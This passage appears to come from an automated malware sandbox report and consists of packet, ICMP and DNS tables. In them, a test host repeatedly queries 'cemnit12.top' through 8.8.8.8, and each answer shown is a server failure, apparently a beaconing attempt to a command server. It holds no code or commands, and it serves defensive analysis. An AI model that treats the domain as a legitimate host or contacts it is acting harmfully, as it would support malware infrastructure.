Oct 13, 2021 03:22:23.716187954 CEST	53	53814	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:24.749830961 CEST	53	53814	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:28.369976044 CEST	62833	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:29.392435074 CEST	62833	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:29.688690901 CEST	53	62833	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:29.810125113 CEST	49944	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:30.705342054 CEST	53	62833	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:30.845782995 CEST	49944	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:31.735200882 CEST	53	49944	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:31.870522022 CEST	63300	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:32.411879063 CEST	53	49944	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:32.892729998 CEST	63300	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:33.751461983 CEST	53	63300	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:34.170511007 CEST	53	63300	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:37.560188055 CEST	61449	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:38.597229958 CEST	61449	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:38.754662037 CEST	53	61449	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:38.867126942 CEST	51275	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:39.874382973 CEST	53	61449	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:39.893666029 CEST	51275	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:40.148868084 CEST	53	51275	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:40.276031017 CEST	63492	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:41.080971956 CEST	53	51275	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:41.299756050 CEST	63492	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:41.582231998 CEST	53	63492	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:41.752464056 CEST	58945	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:42.795219898 CEST	53	63492	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:42.799962044 CEST	58945	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:43.025391102 CEST	53	58945	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:43.141012907 CEST	60779	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:44.143676043 CEST	60779	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:44.356070042 CEST	53	60779	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:44.497792959 CEST	64014	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:45.078459024 CEST	53	58945	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:45.534514904 CEST	64014	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:46.001868010 CEST	53	60779	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:46.397176027 CEST	53	64014	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:46.510869980 CEST	57091	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:46.729011059 CEST	53	64014	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:47.550338984 CEST	57091	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:48.407321930 CEST	53	57091	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:49.749732018 CEST	53	57091	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:52.227858067 CEST	55904	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:53.238090038 CEST	55904	53	192.168.2.4	8.8.8.8
Oct 13, 2021 03:22:53.322173119 CEST	53	55904	8.8.8.8	192.168.2.4
Oct 13, 2021 03:22:54.397630930 CEST	53	55904	8.8.8.8	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Oct 13, 2021 03:21:02.389161110 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:07.457890987 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:12.695169926 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:14.200414896 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:14.984803915 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:19.954612017 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:21.183279037 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:22.913073063 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:28.288692951 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:30.426520109 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:31.997253895 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:37.881751060 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:39.010380030 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:43.851295948 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:45.854525089 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:50.210954905 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:52.137065887 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:21:56.197743893 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:00.995929003 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:05.278378010 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:10.380975962 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:11.515794992 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:13.811274052 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:19.217307091 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:24.750132084 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:30.705503941 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:32.411972046 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:34.170780897 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:39.874576092 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:41.081108093 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:42.795458078 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:45.078603029 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:46.003920078 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:49.749986887 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable
Oct 13, 2021 03:22:54.398039103 CEST	192.168.2.4	8.8.8.8	cff0	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 13, 2021 03:21:00.244450092 CEST	192.168.2.4	8.8.8.8	0x6bcc	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:01.308037996 CEST	192.168.2.4	8.8.8.8	0x6bcc	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:04.875261068 CEST	192.168.2.4	8.8.8.8	0xc440	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:05.885540009 CEST	192.168.2.4	8.8.8.8	0xc440	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:10.324683905 CEST	192.168.2.4	8.8.8.8	0x9530	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:11.339392900 CEST	192.168.2.4	8.8.8.8	0x9530	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:11.837393045 CEST	192.168.2.4	8.8.8.8	0x95ae	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:12.839085102 CEST	192.168.2.4	8.8.8.8	0x95ae	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:13.886396885 CEST	192.168.2.4	8.8.8.8	0x95ae	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:17.879841089 CEST	192.168.2.4	8.8.8.8	0x19ce	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:18.886455059 CEST	192.168.2.4	8.8.8.8	0x19ce	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:19.066164017 CEST	192.168.2.4	8.8.8.8	0xff97	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:20.106025934 CEST	192.168.2.4	8.8.8.8	0xff97	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:20.515779972 CEST	192.168.2.4	8.8.8.8	0x8cfa	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:21.544275999 CEST	192.168.2.4	8.8.8.8	0x8cfa	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:25.910090923 CEST	192.168.2.4	8.8.8.8	0xd6fd	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:26.934092045 CEST	192.168.2.4	8.8.8.8	0xd6fd	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:27.128180981 CEST	192.168.2.4	8.8.8.8	0x7b58	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:28.137290955 CEST	192.168.2.4	8.8.8.8	0x7b58	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:28.338900089 CEST	192.168.2.4	8.8.8.8	0x8496	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:29.341252089 CEST	192.168.2.4	8.8.8.8	0x8496	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:29.861408949 CEST	192.168.2.4	8.8.8.8	0x8d29	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:30.903583050 CEST	192.168.2.4	8.8.8.8	0x8d29	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:35.692908049 CEST	192.168.2.4	8.8.8.8	0x9396	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:36.700745106 CEST	192.168.2.4	8.8.8.8	0x9396	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:36.926614046 CEST	192.168.2.4	8.8.8.8	0x1f01	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:37.936988115 CEST	192.168.2.4	8.8.8.8	0x1f01	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:41.521255970 CEST	192.168.2.4	8.8.8.8	0x12db	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:42.544794083 CEST	192.168.2.4	8.8.8.8	0x12db	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:43.019057989 CEST	192.168.2.4	8.8.8.8	0xf7e5	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:44.060889006 CEST	192.168.2.4	8.8.8.8	0xf7e5	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:48.075043917 CEST	192.168.2.4	8.8.8.8	0x9313	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:49.092323065 CEST	192.168.2.4	8.8.8.8	0x9313	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:49.974162102 CEST	192.168.2.4	8.8.8.8	0x82b8	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:51.030142069 CEST	192.168.2.4	8.8.8.8	0x82b8	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:54.113473892 CEST	192.168.2.4	8.8.8.8	0xd677	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:55.124711037 CEST	192.168.2.4	8.8.8.8	0xd677	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:58.650206089 CEST	192.168.2.4	8.8.8.8	0xa529	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:59.686672926 CEST	192.168.2.4	8.8.8.8	0xa529	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:03.208611965 CEST	192.168.2.4	8.8.8.8	0xd2c1	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:04.203003883 CEST	192.168.2.4	8.8.8.8	0xd2c1	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:08.183978081 CEST	192.168.2.4	8.8.8.8	0xc7bb	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:09.187773943 CEST	192.168.2.4	8.8.8.8	0xc7bb	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:09.558547974 CEST	192.168.2.4	8.8.8.8	0x8042	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:10.594079018 CEST	192.168.2.4	8.8.8.8	0x8042	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:10.961965084 CEST	192.168.2.4	8.8.8.8	0x1bdd	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:12.000963926 CEST	192.168.2.4	8.8.8.8	0x1bdd	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:16.967132092 CEST	192.168.2.4	8.8.8.8	0x2d34	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:17.969856024 CEST	192.168.2.4	8.8.8.8	0x2d34	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:21.821299076 CEST	192.168.2.4	8.8.8.8	0xb865	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:22.959636927 CEST	192.168.2.4	8.8.8.8	0xb865	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:28.369976044 CEST	192.168.2.4	8.8.8.8	0xad6	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:29.392435074 CEST	192.168.2.4	8.8.8.8	0xad6	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:29.810125113 CEST	192.168.2.4	8.8.8.8	0x3214	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:30.845782995 CEST	192.168.2.4	8.8.8.8	0x3214	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:31.870522022 CEST	192.168.2.4	8.8.8.8	0xa7de	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:32.892729998 CEST	192.168.2.4	8.8.8.8	0xa7de	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:37.560188055 CEST	192.168.2.4	8.8.8.8	0xf2cd	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:38.597229958 CEST	192.168.2.4	8.8.8.8	0xf2cd	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:38.867126942 CEST	192.168.2.4	8.8.8.8	0x2315	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:39.893666029 CEST	192.168.2.4	8.8.8.8	0x2315	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:40.276031017 CEST	192.168.2.4	8.8.8.8	0xeea3	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:41.299756050 CEST	192.168.2.4	8.8.8.8	0xeea3	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:41.752464056 CEST	192.168.2.4	8.8.8.8	0xc7e8	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:42.799962044 CEST	192.168.2.4	8.8.8.8	0xc7e8	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:43.141012907 CEST	192.168.2.4	8.8.8.8	0xa034	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:44.143676043 CEST	192.168.2.4	8.8.8.8	0xa034	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:44.497792959 CEST	192.168.2.4	8.8.8.8	0x1da0	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:45.534514904 CEST	192.168.2.4	8.8.8.8	0x1da0	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:46.510869980 CEST	192.168.2.4	8.8.8.8	0x524e	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:47.550338984 CEST	192.168.2.4	8.8.8.8	0x524e	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:52.227858067 CEST	192.168.2.4	8.8.8.8	0xae31	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:53.238090038 CEST	192.168.2.4	8.8.8.8	0xae31	Standard query (0)	cemnit12.top	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 13, 2021 03:21:01.583400011 CEST	8.8.8.8	192.168.2.4	0x6bcc	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:02.389056921 CEST	8.8.8.8	192.168.2.4	0x6bcc	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:05.974519968 CEST	8.8.8.8	192.168.2.4	0xc440	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:07.457341909 CEST	8.8.8.8	192.168.2.4	0xc440	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:11.700870991 CEST	8.8.8.8	192.168.2.4	0x9530	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:12.694979906 CEST	8.8.8.8	192.168.2.4	0x9530	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:13.898669958 CEST	8.8.8.8	192.168.2.4	0x95ae	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:14.200314045 CEST	8.8.8.8	192.168.2.4	0x95ae	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:14.984724045 CEST	8.8.8.8	192.168.2.4	0x95ae	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:18.955882072 CEST	8.8.8.8	192.168.2.4	0x19ce	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:19.952100992 CEST	8.8.8.8	192.168.2.4	0x19ce	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:20.366436005 CEST	8.8.8.8	192.168.2.4	0xff97	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:21.183137894 CEST	8.8.8.8	192.168.2.4	0xff97	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:21.881818056 CEST	8.8.8.8	192.168.2.4	0x8cfa	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:22.912961960 CEST	8.8.8.8	192.168.2.4	0x8cfa	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:27.011250019 CEST	8.8.8.8	192.168.2.4	0xd6fd	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:28.199316978 CEST	8.8.8.8	192.168.2.4	0x7b58	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:28.288079023 CEST	8.8.8.8	192.168.2.4	0xd6fd	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:29.217339993 CEST	8.8.8.8	192.168.2.4	0x7b58	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:29.749722958 CEST	8.8.8.8	192.168.2.4	0x8496	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:30.426400900 CEST	8.8.8.8	192.168.2.4	0x8496	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:30.939423084 CEST	8.8.8.8	192.168.2.4	0x8d29	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:31.997054100 CEST	8.8.8.8	192.168.2.4	0x8d29	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:36.781883001 CEST	8.8.8.8	192.168.2.4	0x9396	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:37.881616116 CEST	8.8.8.8	192.168.2.4	0x9396	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:37.987848997 CEST	8.8.8.8	192.168.2.4	0x1f01	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:39.009149075 CEST	8.8.8.8	192.168.2.4	0x1f01	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:42.901144028 CEST	8.8.8.8	192.168.2.4	0x12db	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:43.851013899 CEST	8.8.8.8	192.168.2.4	0x12db	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:44.115537882 CEST	8.8.8.8	192.168.2.4	0xf7e5	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:45.854366064 CEST	8.8.8.8	192.168.2.4	0xf7e5	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:49.850893974 CEST	8.8.8.8	192.168.2.4	0x9313	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:50.210850954 CEST	8.8.8.8	192.168.2.4	0x9313	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:51.072808981 CEST	8.8.8.8	192.168.2.4	0x82b8	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:52.136120081 CEST	8.8.8.8	192.168.2.4	0x82b8	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:55.217227936 CEST	8.8.8.8	192.168.2.4	0xd677	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:56.197609901 CEST	8.8.8.8	192.168.2.4	0xd677	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:21:59.739356995 CEST	8.8.8.8	192.168.2.4	0xa529	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:00.993825912 CEST	8.8.8.8	192.168.2.4	0xa529	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:04.321183920 CEST	8.8.8.8	192.168.2.4	0xd2c1	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:05.278219938 CEST	8.8.8.8	192.168.2.4	0xd2c1	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:09.427354097 CEST	8.8.8.8	192.168.2.4	0xc7bb	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:10.380769014 CEST	8.8.8.8	192.168.2.4	0xc7bb	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:10.836510897 CEST	8.8.8.8	192.168.2.4	0x8042	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:11.515616894 CEST	8.8.8.8	192.168.2.4	0x8042	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:12.187814951 CEST	8.8.8.8	192.168.2.4	0x1bdd	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:13.810981989 CEST	8.8.8.8	192.168.2.4	0x1bdd	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:18.229638100 CEST	8.8.8.8	192.168.2.4	0x2d34	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:19.216985941 CEST	8.8.8.8	192.168.2.4	0x2d34	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:23.716187954 CEST	8.8.8.8	192.168.2.4	0xb865	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:24.749830961 CEST	8.8.8.8	192.168.2.4	0xb865	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:29.688690901 CEST	8.8.8.8	192.168.2.4	0xad6	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:30.705342054 CEST	8.8.8.8	192.168.2.4	0xad6	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:31.735200882 CEST	8.8.8.8	192.168.2.4	0x3214	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:32.411879063 CEST	8.8.8.8	192.168.2.4	0x3214	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:33.751461983 CEST	8.8.8.8	192.168.2.4	0xa7de	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:34.170511007 CEST	8.8.8.8	192.168.2.4	0xa7de	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:38.754662037 CEST	8.8.8.8	192.168.2.4	0xf2cd	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:39.874382973 CEST	8.8.8.8	192.168.2.4	0xf2cd	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:40.148868084 CEST	8.8.8.8	192.168.2.4	0x2315	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
